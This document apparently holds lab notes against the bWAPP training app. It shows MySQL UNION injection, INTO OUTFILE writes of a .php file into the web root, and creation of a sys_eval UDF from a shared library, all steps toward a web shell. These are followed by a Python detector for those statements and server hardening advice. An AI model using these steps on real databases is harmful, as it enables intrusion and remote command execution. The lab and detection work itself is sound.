mysql> select * from heroes where id = 7;
Empty set (0.00 sec)
mysql> select * from heroes where id = 7 union select 1,2,3,4;
+----+-------+----------+--------+
| id | login | password | secret |
+----+-------+----------+--------+
|  1 | 2     | 3        | 4      |
+----+-------+----------+--------+
1 row in set (0.00 sec)
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/';
ERROR 1086 (HY000): File '/var/www/html/' already exists
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/abc.txt';
ERROR 1 (HY000): Can't create/write to file '/var/www/html/abc.txt' (Errcode: 13)
mysql>
Find a folder with write permission.
mysql> use bWAPP;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/images/abc.php';
Query OK, 1 row affected (0.00 sec)
mysql>
Strip the newlines.
tr -d '\n' < input.txt > output.txt
Written successfully.
Create a user-defined function.
create function sys_eval returns string soname "lib_linux1.so";
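A detection-side example added here (not part of the original notes): it scans MySQL general-query-log style lines for the two statements used in the session above, INTO OUTFILE writes and CREATE FUNCTION ... SONAME. The log lines, the rule names and the /var/www/ web-root prefix are constructed assumptions.

```python
import re

# Patterns for the two statements shown in the session above.
OUTFILE_RE = re.compile(r"\binto\s+(outfile|dumpfile)\s+(['\"])(.+?)\2", re.I)
UDF_RE = re.compile(
    r"\bcreate\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+(['\"])(.+?)\2",
    re.I,
)
# Assumption: the web root is /var/www/, as in the session above.
WEB_ROOT = "/var/www/"
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")


def classify(query):
    """Return a list of (rule, detail) findings for one SQL statement."""
    findings = []
    m = OUTFILE_RE.search(query)
    if m:
        path = m.group(3)
        findings.append(("file_write", path))
        if path.startswith(WEB_ROOT):
            findings.append(("file_write_web_root", path))
        if path.lower().endswith(SCRIPT_EXT):
            findings.append(("file_write_script_ext", path))
    m = UDF_RE.search(query)
    if m:
        findings.append(("udf_create", f"{m.group(1)} <- {m.group(3)}"))
    return findings


def scan(log_lines):
    """Scan general-query-log style lines; return {line_no: findings}."""
    hits = {}
    for no, line in enumerate(log_lines, 1):
        found = classify(line)
        if found:
            hits[no] = found
    return hits


# Constructed sample lines in the shape of a MySQL general query log.
SAMPLE_LOG = [
    "12 Query select * from heroes where id = 7",
    "12 Query select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/images/abc.php'",
    "12 Query create function sys_eval returns string soname \"lib_linux1.so\"",
    "13 Query select login from heroes into outfile '/tmp/export.csv'",
]

if __name__ == "__main__":
    for no, found in scan(SAMPLE_LOG).items():
        print(no, found)
```

On the server side, a restrictive secure_file_priv setting and revoking the FILE privilege from the application account stop the INTO OUTFILE step.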